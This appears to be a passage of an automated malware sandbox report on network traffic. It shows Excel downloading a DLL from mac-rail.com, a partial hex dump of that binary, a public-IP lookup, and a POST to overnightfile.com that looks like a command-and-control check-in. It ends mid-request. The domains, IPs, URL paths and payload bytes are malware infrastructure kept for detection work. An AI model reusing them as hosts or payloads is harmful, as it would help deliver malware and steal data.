                                                                                                                                      Jul 14, 2020 11:22:24.502304077 CEST804971991.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:24.502701998 CEST4971980192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:24.818351030 CEST4971980192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:24.910289049 CEST804971991.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:24.910696983 CEST4971980192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:25.244096041 CEST4971980192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:25.340518951 CEST804971991.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:25.340783119 CEST4971980192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:25.688595057 CEST4971980192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:25.783973932 CEST804971991.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:25.784248114 CEST4971980192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:26.096357107 CEST4971980192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:26.191376925 CEST804971991.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:26.191543102 CEST4971980192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:26.510360956 CEST4971980192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:26.605473042 CEST804971991.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:26.605854988 CEST4971980192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:26.888808012 CEST4971980192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:26.980513096 CEST804971991.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:26.980798006 CEST4971980192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:27.289052010 CEST4971980192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:27.383918047 CEST804971991.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:27.384140015 CEST4971980192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:22:28.653850079 CEST4972080192.168.1.1028.208.80.226
                                                                                                                                      Jul 14, 2020 11:22:28.653912067 CEST4972180192.168.1.1028.208.80.226
                                                                                                                                      Jul 14, 2020 11:22:28.691236019 CEST80497218.208.80.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:28.691276073 CEST80497208.208.80.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:28.691459894 CEST4972180192.168.1.1028.208.80.226
                                                                                                                                      Jul 14, 2020 11:22:28.691507101 CEST4972080192.168.1.1028.208.80.226
                                                                                                                                      Jul 14, 2020 11:22:28.692337990 CEST4972180192.168.1.1028.208.80.226
                                                                                                                                      Jul 14, 2020 11:22:28.770314932 CEST80497218.208.80.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:28.938731909 CEST80497218.208.80.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:28.938761950 CEST80497218.208.80.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:28.938843966 CEST4972180192.168.1.1028.208.80.226
                                                                                                                                      Jul 14, 2020 11:22:28.940252066 CEST4972180192.168.1.1028.208.80.226
                                                                                                                                      Jul 14, 2020 11:22:28.977508068 CEST80497218.208.80.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:30.036714077 CEST4972080192.168.1.1028.208.80.226

                                                                                                                                      UDP Packets

                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Jul 14, 2020 11:20:13.531610966 CEST4938353192.168.1.1028.8.8.8
                                                                                                                                      Jul 14, 2020 11:20:13.544059038 CEST5620753192.168.1.1028.8.8.8
                                                                                                                                      Jul 14, 2020 11:20:13.567631006 CEST53562078.8.8.8192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:13.571919918 CEST53493838.8.8.8192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:14.008306980 CEST5347753192.168.1.1028.8.8.8
                                                                                                                                      Jul 14, 2020 11:20:14.047723055 CEST53534778.8.8.8192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:23.698698044 CEST5976553192.168.1.1028.8.8.8
                                                                                                                                      Jul 14, 2020 11:20:24.043000937 CEST53597658.8.8.8192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:33.805907011 CEST5649153192.168.1.1028.8.8.8
                                                                                                                                      Jul 14, 2020 11:20:33.829677105 CEST53564918.8.8.8192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:34.154738903 CEST5483453192.168.1.1028.8.8.8
                                                                                                                                      Jul 14, 2020 11:20:34.463275909 CEST53548348.8.8.8192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:34.689542055 CEST5555153192.168.1.1028.8.8.8
                                                                                                                                      Jul 14, 2020 11:20:34.835613012 CEST53555518.8.8.8192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:39.824157953 CEST5825853192.168.1.1028.8.8.8
                                                                                                                                      Jul 14, 2020 11:20:40.141748905 CEST53582588.8.8.8192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:47.429687023 CEST5004253192.168.1.1028.8.8.8
                                                                                                                                      Jul 14, 2020 11:20:47.461544991 CEST53500428.8.8.8192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:54.150916100 CEST5637453192.168.1.1028.8.8.8
                                                                                                                                      Jul 14, 2020 11:20:54.174556017 CEST53563748.8.8.8192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:15.361723900 CEST6022053192.168.1.1028.8.8.8
                                                                                                                                      Jul 14, 2020 11:21:15.394793034 CEST53602208.8.8.8192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:19.415286064 CEST5714853192.168.1.1028.8.8.8
                                                                                                                                      Jul 14, 2020 11:21:19.781559944 CEST53571488.8.8.8192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:45.370604992 CEST5703853192.168.1.1028.8.8.8
                                                                                                                                      Jul 14, 2020 11:21:45.404340029 CEST53570388.8.8.8192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:46.386745930 CEST5703853192.168.1.1028.8.8.8
                                                                                                                                      Jul 14, 2020 11:21:46.418695927 CEST53570388.8.8.8192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:47.395742893 CEST5703853192.168.1.1028.8.8.8
                                                                                                                                      Jul 14, 2020 11:21:47.427670956 CEST53570388.8.8.8192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:49.399339914 CEST5703853192.168.1.1028.8.8.8
                                                                                                                                      Jul 14, 2020 11:21:49.423011065 CEST53570388.8.8.8192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:53.407613993 CEST5703853192.168.1.1028.8.8.8
                                                                                                                                      Jul 14, 2020 11:21:53.439635038 CEST53570388.8.8.8192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:03.245176077 CEST6415953192.168.1.1028.8.8.8
                                                                                                                                      Jul 14, 2020 11:22:03.278695107 CEST53641598.8.8.8192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:05.000102997 CEST6543953192.168.1.1028.8.8.8
                                                                                                                                      Jul 14, 2020 11:22:06.001909018 CEST6543953192.168.1.1028.8.8.8
                                                                                                                                      Jul 14, 2020 11:22:06.310211897 CEST53654398.8.8.8192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:06.364929914 CEST53654398.8.8.8192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:27.949683905 CEST5198753192.168.1.1028.8.8.8
                                                                                                                                      Jul 14, 2020 11:22:27.982810020 CEST53519878.8.8.8192.168.1.102
                                                                                                                                      Jul 14, 2020 11:22:28.345123053 CEST5892053192.168.1.1028.8.8.8
                                                                                                                                      Jul 14, 2020 11:22:28.647974968 CEST53589208.8.8.8192.168.1.102

                                                                                                                                      ICMP Packets

                                                                                                                                      TimestampSource IPDest IPChecksumCodeType
                                                                                                                                      Jul 14, 2020 11:22:06.364996910 CEST192.168.1.1028.8.8.8cf63(Port unreachable)Destination Unreachable

                                                                                                                                      DNS Queries

                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                      Jul 14, 2020 11:20:23.698698044 CEST192.168.1.1028.8.8.80x754eStandard query (0)mac-rail.comA (IP address)IN (0x0001)
                                                                                                                                      Jul 14, 2020 11:20:33.805907011 CEST192.168.1.1028.8.8.80x15baStandard query (0)api.ipify.orgA (IP address)IN (0x0001)
                                                                                                                                      Jul 14, 2020 11:20:34.154738903 CEST192.168.1.1028.8.8.80x6135Standard query (0)overnightfile.comA (IP address)IN (0x0001)
                                                                                                                                      Jul 14, 2020 11:20:34.689542055 CEST192.168.1.1028.8.8.80xb634Standard query (0)accesoeducativo.comA (IP address)IN (0x0001)
                                                                                                                                      Jul 14, 2020 11:20:39.824157953 CEST192.168.1.1028.8.8.80x343aStandard query (0)overnightfile.comA (IP address)IN (0x0001)
                                                                                                                                      Jul 14, 2020 11:20:47.429687023 CEST192.168.1.1028.8.8.80x2499Standard query (0)overnightfile.comA (IP address)IN (0x0001)
                                                                                                                                      Jul 14, 2020 11:21:19.415286064 CEST192.168.1.1028.8.8.80x55cStandard query (0)gaw.explik.atA (IP address)IN (0x0001)
                                                                                                                                      Jul 14, 2020 11:22:05.000102997 CEST192.168.1.1028.8.8.80xdc75Standard query (0)gaw.explik.atA (IP address)IN (0x0001)
                                                                                                                                      Jul 14, 2020 11:22:06.001909018 CEST192.168.1.1028.8.8.80xdc75Standard query (0)gaw.explik.atA (IP address)IN (0x0001)
                                                                                                                                      Jul 14, 2020 11:22:28.345123053 CEST192.168.1.1028.8.8.80xef59Standard query (0)low.explik.atA (IP address)IN (0x0001)

                                                                                                                                      DNS Answers

                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                      Jul 14, 2020 11:20:13.567631006 CEST8.8.8.8192.168.1.1020x6473No error (0)l-0014.config.skype.comconfig-edge-skype.l-0014.l-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                      Jul 14, 2020 11:20:24.043000937 CEST8.8.8.8192.168.1.1020x754eNo error (0)mac-rail.com5.101.51.247A (IP address)IN (0x0001)
                                                                                                                                      Jul 14, 2020 11:20:24.043000937 CEST8.8.8.8192.168.1.1020x754eNo error (0)mac-rail.com8.211.45.110A (IP address)IN (0x0001)
                                                                                                                                      Jul 14, 2020 11:20:33.829677105 CEST8.8.8.8192.168.1.1020x15baNo error (0)api.ipify.orgnagano-19599.herokussl.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                      Jul 14, 2020 11:20:33.829677105 CEST8.8.8.8192.168.1.1020x15baNo error (0)nagano-19599.herokussl.comelb097307-934924932.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                      Jul 14, 2020 11:20:33.829677105 CEST8.8.8.8192.168.1.1020x15baNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.225.191.113A (IP address)IN (0x0001)
                                                                                                                                      Jul 14, 2020 11:20:33.829677105 CEST8.8.8.8192.168.1.1020x15baNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.235.136.99A (IP address)IN (0x0001)
                                                                                                                                      Jul 14, 2020 11:20:33.829677105 CEST8.8.8.8192.168.1.1020x15baNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.225.182.172A (IP address)IN (0x0001)
                                                                                                                                      Jul 14, 2020 11:20:33.829677105 CEST8.8.8.8192.168.1.1020x15baNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.213.140A (IP address)IN (0x0001)
                                                                                                                                      Jul 14, 2020 11:20:33.829677105 CEST8.8.8.8192.168.1.1020x15baNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.235.83.248A (IP address)IN (0x0001)
                                                                                                                                      Jul 14, 2020 11:20:33.829677105 CEST8.8.8.8192.168.1.1020x15baNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com107.22.251.25A (IP address)IN (0x0001)
                                                                                                                                      Jul 14, 2020 11:20:33.829677105 CEST8.8.8.8192.168.1.1020x15baNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.221.234.156A (IP address)IN (0x0001)
                                                                                                                                      Jul 14, 2020 11:20:33.829677105 CEST8.8.8.8192.168.1.1020x15baNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com174.129.255.253A (IP address)IN (0x0001)
                                                                                                                                      Jul 14, 2020 11:20:34.463275909 CEST8.8.8.8192.168.1.1020x6135No error (0)overnightfile.com91.218.231.226A (IP address)IN (0x0001)
                                                                                                                                      Jul 14, 2020 11:20:34.835613012 CEST8.8.8.8192.168.1.1020xb634No error (0)accesoeducativo.com185.206.163.136A (IP address)IN (0x0001)
                                                                                                                                      Jul 14, 2020 11:20:40.141748905 CEST8.8.8.8192.168.1.1020x343aNo error (0)overnightfile.com91.218.231.226A (IP address)IN (0x0001)
                                                                                                                                      Jul 14, 2020 11:20:47.461544991 CEST8.8.8.8192.168.1.1020x2499No error (0)overnightfile.com91.218.231.226A (IP address)IN (0x0001)
                                                                                                                                      Jul 14, 2020 11:21:19.781559944 CEST8.8.8.8192.168.1.1020x55cNo error (0)gaw.explik.at8.208.80.226A (IP address)IN (0x0001)
                                                                                                                                      Jul 14, 2020 11:22:06.310211897 CEST8.8.8.8192.168.1.1020xdc75No error (0)gaw.explik.at8.208.80.226A (IP address)IN (0x0001)
                                                                                                                                      Jul 14, 2020 11:22:06.364929914 CEST8.8.8.8192.168.1.1020xdc75No error (0)gaw.explik.at8.208.80.226A (IP address)IN (0x0001)
                                                                                                                                      Jul 14, 2020 11:22:28.647974968 CEST8.8.8.8192.168.1.1020xef59No error (0)low.explik.at8.208.80.226A (IP address)IN (0x0001)

                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                      • mac-rail.com
                                                                                                                                      • api.ipify.org
                                                                                                                                      • overnightfile.com
                                                                                                                                      • gaw.explik.at
                                                                                                                                      • low.explik.at

                                                                                                                                      HTTP Packets

                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                      0192.168.1.102497045.101.51.24780C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                      Jul 14, 2020 11:20:24.193181992 CEST129OUTGET /434.dll HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                      Host: mac-rail.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Jul 14, 2020 11:20:24.407891035 CEST131INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Tue, 14 Jul 2020 09:20:24 GMT
                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                      Content-Length: 375808
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Last-Modified: Mon, 13 Jul 2020 09:45:24 GMT
                                                                                                                                      ETag: "5f0c2d34-5bc00"
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 00 24 0c 5f 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 02 32 00 22 05 00 00 96 00 00 00 00 00 00 b0 33 05 00 00 10 00 00 00 40 05 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 06 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f8 a3 05 00 c8 00 00 00 00 e0 05 00 74 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 05 00 50 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e4 ab 05 00 24 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6f 00 00 00 00 00 00 00 f4 13 05 00 00 10 00 00 00 14 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 65 78 74 00 00 00 b4 0d 00 00 00 30 05 00 00 0e 00 00 00 18 05 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fe 01 00 00 00 40 05 00 00 02 00 00 00 26 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 64 61 74 61 32 00 20 4e 00 00 00 50 05 00 00 50 00 00 00 28 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 08 33 00 00 00 a0 05 00 00 34 00 00 00 78 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 07 00 00 00 e0 05 00 00 08 00 00 00 ac 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 50 06 00 00 00 f0 05 00 00 08 00 00 00 b4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 00 00 39 e7 33 34 35 e3 37 38 21 e5 31 32 1b e1 00 00 08 d5 00 56 61 a7 74 75 29 b9 41 6c 2c ba 63 00 08 d5 00 00 08 d5 56 69 1a a1 75 61 2c 93 72 65 2d d5 00 00 08 d5 00 00 08 80 6e 6d e9 a4 56 69 ed a1 4f 66 c6 bb 6c 65 08 d5 00 00 b6 bb 72
                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL$_!2"3@tP$o `.text0 `.rdata@&@@.rdata2 NPP(@@.data34x@.rsrct@@.relocP@B934578!12Vatu)Al,cViua,re-nmViOfler
                                                                                                                                      Jul 14, 2020 11:20:24.407928944 CEST132INData Raw: 74 dd b3 6c 50 da b9 74 65 ab a0 00 00 08 d5 00 4c a7 b3 64 4c a1 b6 72 61 9a ab 45 78 c9 d4 00 00 08 d5 47 65 94 97 6f 64 7d b9 65 48 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21
                                                                                                                                      Data Ascii: tlPteLdLraExGeod}eH!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!idlmetUdulHafle7Kea4Fi$AS%Fi$Po!teWreFeloHaletTpPhAl!!!!!!!!
                                                                                                                                      Jul 14, 2020 11:20:24.407953978 CEST134INData Raw: 00 61 b1 00 00 61 d7 00 00 31 d7 00 00 31 d7 00 00 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21
                                                                                                                                      Data Ascii: aa11!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!aB!11!!qqaaqqaa1!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                                                                                                                                      Jul 14, 2020 11:20:24.408010006 CEST135INData Raw: 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 8c 20 02 51 75 9f 55 e4 e9 1f ff ff 61 79 c8 05 ea 82 e4 8d 6d 1a 77 89 6c 28 8b
                                                                                                                                      Data Ascii: !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! QuUaymwl(M1E!HUYUjIusrSMmQ2U:aEE:MEX:U!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                                                                                                                                      Jul 14, 2020 11:20:24.408035994 CEST136INData Raw: 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 69 ce 00 00 bb d1 8d 85 e9 2d ff ff 51 f9 09 fb d6 2b 83 c4 75 9e 8d 34 34 2c ff 51 ea 85 0c 52 36 c6 24 20 71 c1 85 c0 7c 15 32 c0 0a 86 6a 00 8b 15 8c 45 61 81 8b
                                                                                                                                      Data Ascii: !!!!!!!!!!!!!!!!!!!!!!!!!!!i-Q+u44,QR6$ q|2jEa-QR& !3EdU\u:P6, !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!LKLEEy
                                                                                                                                      Jul 14, 2020 11:20:24.408061028 CEST138INData Raw: d2 00 00 99 b2 00 00 91 b2 00 00 79 b2 00 00 f1 07 ff ff e1 07 ff ff 85 b2 00 00 23 b2 00 00 b1 d2 01 00 65 79 75 6e c2 7a 65 72 ad 9e 4c 2e 4d 7e 6c 00 92 a6 61 72 ad d2 53 74 a6 a2 00 00 71 d2 00 00 61 d2 00 00 61 d2 00 00 31 d2 00 00 31 d2 00
                                                                                                                                      Data Ascii: y#eyunzerL.M~larStqaa11!!11!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!)qq
                                                                                                                                      Jul 14, 2020 11:20:24.408087015 CEST139INData Raw: d3 00 00 91 d0 00 00 e7 0a b9 0e b1 57 09 cd d0 6b 01 4c 64 b1 54 68 08 a0 20 70 a3 7a 67 72 d0 7c 20 63 c0 7d 6e 6f ad b3 62 65 11 9f 75 6e 11 7a 6e 20 ad 9a 53 20 44 7a 64 65 67 dc 0d 0a 4d d3 00 00 61 d3 00 00 74 ed f1 8f 58 ca 9f dc 48 ca 9f
                                                                                                                                      Data Ascii: WkLdTh pzgr| c}nobeunzn S DzdegMatXHHWZ!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!Zu~eA#xchm]z
                                                                                                                                      Jul 14, 2020 11:20:24.408113003 CEST141INData Raw: d4 00 00 e1 d4 00 00 e1 d4 00 00 b1 d4 00 00 b1 d4 00 00 a1 d4 00 00 a1 d4 00 00 b1 d4 00 00 b1 d4 00 00 a1 d4 00 00 a1 d4 00 00 71 d4 00 00 71 d4 00 00 61 d4 00 00 61 d4 00 00 71 d4 00 00 71 d4 00 00 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21
                                                                                                                                      Data Ascii: qqaaqq!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!aMEE!AE!1!=@ZhKh#b:aE9X}T?@EVr
                                                                                                                                      Jul 14, 2020 11:20:24.408138037 CEST142INData Raw: d5 eb 4d e6 47 55 08 62 0f 61 7c c1 f8 bc 45 b9 54 f8 7a b6 d0 b8 01 a1 d5 00 eb 5d f8 bc 4d 99 54 f9 30 b5 05 0e be 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21
                                                                                                                                      Data Ascii: MGUba|ETz]MT0!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!Lp(u13|tr@1u6K@br@tjPK@D!]r8e8~tr@t!!!!!!!!!!!!!!
                                                                                                                                      Jul 14, 2020 11:20:24.408165932 CEST143INData Raw: 16 00 8b e4 02 73 40 e1 30 04 01 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 b1 33 45 f4 b0
                                                                                                                                      Data Ascii: s@0!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!3E"Uk@fX#us@ai-E2EaQRPl6Qs@!-*ES}Nr,}!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                                                                                                                                      Jul 14, 2020 11:20:24.472898960 CEST145INData Raw: 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 c9 81 e8 a1 c8 2b ff 83 9d dc 8b 45 9d 5f e5 5d b2 04 cc cc a5 04 cc cc 0c 60 ec 83 45 c5 c7 45 85
                                                                                                                                      Data Ascii: !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!+E_]`EEP^E9:6,XEjpDM^U^E^M?vq]XEUE@M)1(*]E!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!_]


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                      1192.168.1.1024970554.225.191.11380C:\Windows\SysWOW64\svchost.exe
                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                      Jul 14, 2020 11:20:33.993360996 CEST515OUTGET / HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: api.ipify.org
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Jul 14, 2020 11:20:34.096435070 CEST515INHTTP/1.1 200 OK
                                                                                                                                      Server: Cowboy
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Content-Type: text/plain
                                                                                                                                      Vary: Origin
                                                                                                                                      Date: Tue, 14 Jul 2020 09:20:34 GMT
                                                                                                                                      Content-Length: 11
                                                                                                                                      Via: 1.1 vegur
                                                                                                                                      Data Raw: 38 34 2e 31 37 2e 35 32 2e 33 36
                                                                                                                                      Data Ascii: 84.17.52.36


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                      2192.168.1.1024970691.218.231.22680C:\Windows\SysWOW64\svchost.exe
                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                      Jul 14, 2020 11:20:34.531091928 CEST516OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
